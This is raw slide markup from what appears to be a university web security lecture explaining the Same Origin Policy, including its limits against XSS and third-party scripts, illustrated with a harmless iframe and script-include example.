          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7027878" y="3592459"/>
            <a:ext cx="1124881" cy="10099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42" name="Rechthoek 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="3687958"/>
            <a:ext cx="1145088" cy="104240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189940" y="3773356"/>
            <a:ext cx="1251511" cy="104188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5065" b="55141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036204" y="2359768"/>
            <a:ext cx="2784383" cy="485962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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="347852" y="2468677"/>
            <a:ext cx="1078454" cy="162873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644791" y="4005822"/>
            <a:ext cx="1252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JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974399" y="3911716"/>
            <a:ext cx="1626414" cy="7771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46" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5004362" y="4091121"/>
            <a:ext cx="1565190" cy="661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9559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467640" y="188640"/>
            <a:ext cx="8229240" cy="7916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spc="-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Same Origin Policy: what the ad company can see  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike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8" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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1200" b="0" strike="noStrike" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B8B8B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>websec</a:t>
            </a:r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29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B0415C0-6A13-44C7-8A94-44C174F178B4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707925" y="3356992"/>
            <a:ext cx="1824075" cy="20162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en-US" sz="2400" spc="-1" dirty="0" err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1478640" y="2997941"/>
            <a:ext cx="523072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07" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1406074" y="3290003"/>
            <a:ext cx="519032" cy="45719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442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13" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117598" y="1598291"/>
            <a:ext cx="2193086" cy="4604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advertising.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4933400" y="1657016"/>
            <a:ext cx="1100700" cy="146483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17" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4951287" y="1198158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27" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076604" y="990622"/>
            <a:ext cx="2234080" cy="522271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600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18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maps.google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Groep 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2019600" y="2359768"/>
            <a:ext cx="2823252" cy="2370600"/>
            <a:chOff x="3021469" y="3278868"/>
            <a:chExt cx="2072976" cy="2271612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3021469" y="3278868"/>
              <a:ext cx="2067965" cy="227161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8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1800" b="0" strike="noStrike" spc="-1" dirty="0"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z="1800" b="0" strike="noStrike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pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" err="1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facebook</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400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content</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike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 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3100324" y="4227009"/>
              <a:ext cx="841388" cy="777630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other</a:t>
              </a:r>
            </a:p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user’s</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US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content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3033662" y="3753781"/>
              <a:ext cx="2060783" cy="1796698"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln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strike="noStrike" spc="-1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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="Afbeelding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33661" y="3288111"/>
              <a:ext cx="2044437" cy="459951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4962707" y="1398045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8" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4945910" y="1933619"/>
            <a:ext cx="1079640" cy="1367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headEnd type="arrow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41" name="Rechthoek 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7027878" y="3592459"/>
            <a:ext cx="1124881" cy="100990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42" name="Rechthoek 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="3687958"/>
            <a:ext cx="1145088" cy="104240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sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rechthoek 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189940" y="3773356"/>
            <a:ext cx="1251511" cy="1041889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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user-supplied content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r="5065" b="55141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036204" y="2359768"/>
            <a:ext cx="2784383" cy="485962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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="347852" y="2468677"/>
            <a:ext cx="1078454" cy="1628732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3888683" y="3338177"/>
            <a:ext cx="761603" cy="308864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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-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4" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974399" y="3911716"/>
            <a:ext cx="1626414" cy="77714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35" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5004362" y="4091121"/>
            <a:ext cx="1565190" cy="66198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1680">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Tijdelijke aanduiding voor inhoud 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1052736"/>
            <a:ext cx="8229600" cy="54726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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC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  <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4032724" y="2997941"/>
            <a:ext cx="345441" cy="412594"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDown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3232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SOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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/>
              <a:t>For examples of the SOP in action, experiment with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008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   http://www.cs.ru.nl/~erikpoll/websec/demo/test_SOP.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>and look at the HTML code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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld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4D9351D-9212-F0AF-8DD4-8B9D0A814A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105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792088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SOP tricky details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>no help against XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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95751" y="1052736"/>
            <a:ext cx="4360209" cy="2933092"/>
            <a:chOff x="3023172" y="1860802"/>
            <a:chExt cx="2950482" cy="3168352"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3023172" y="1860802"/>
              <a:ext cx="2950482" cy="3168352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2400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trusted content</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:endParaRPr lang="en-US" sz="2400" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" spc="-1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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40567" y="1873694"/>
              <a:ext cx="2916913" cy="641521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448163" y="4109784"/>
            <a:ext cx="80251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 Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious contents included with HTML injection (incl. XSS, either reflected or stored), counts as coming from the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="20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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So scripts in such malicious content can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>read &amp; modify anything on the webpage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000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" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2001680" y="2606963"/>
            <a:ext cx="1872208" cy="721453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pc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malicious html fragment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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977089"/>
            <a:ext cx="346957" cy="346957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4F0767-D5E5-D1B4-03A9-B03E3584C2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4964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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3013E7DE-7494-DEBE-241F-B1CF388E9342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076198" y="1095080"/>
            <a:ext cx="4360209" cy="3007510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CC33"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="020703090202050204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96944" cy="792088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SOP tricky details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>no help against malicious libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="240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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Groep 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1055939" y="1102160"/>
            <a:ext cx="4380468" cy="3007510"/>
            <a:chOff x="3023172" y="1873694"/>
            <a:chExt cx="2964191" cy="3155460"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3023172" y="2515215"/>
              <a:ext cx="2964191" cy="2513939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tx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tIns="45000" rIns="90000" bIns="45000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" spc="-1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>trusted content</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:endParaRPr lang="en-US" sz="2400" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" spc="-1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;iframe src="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FF9933"/>
                  </a:highlight>
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>https://ad.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/a.html"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   &lt;/iframe&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="nl-NL" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  &lt;script scr=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="00FFFF"/>
                  </a:highlight>
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>https://b.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" b="1" dirty="0">
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/lib.js"&gt;&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="Afbeelding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1" t="11993" r="36030" b="5369"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3040567" y="1873694"/>
              <a:ext cx="2933087" cy="641521"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Tekstvak 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472520" y="4488112"/>
            <a:ext cx="73021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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scripts in  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lib.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>observe or interact with content originating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from bank.com?  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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Yes! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Beware of confusion: if HTML from bank.com includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="30000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> party </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scripts from b.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, these count as bank.com content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0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C9BAA663-BF2C-0C8C-CF4F-F28EFCD1275A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="1142476"/>
            <a:ext cx="1995000" cy="804472"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CC33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bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08B0EDB-500E-F144-5C7F-7ABC5C045D31}"/>
              </a:ext>
            </a:extLst>
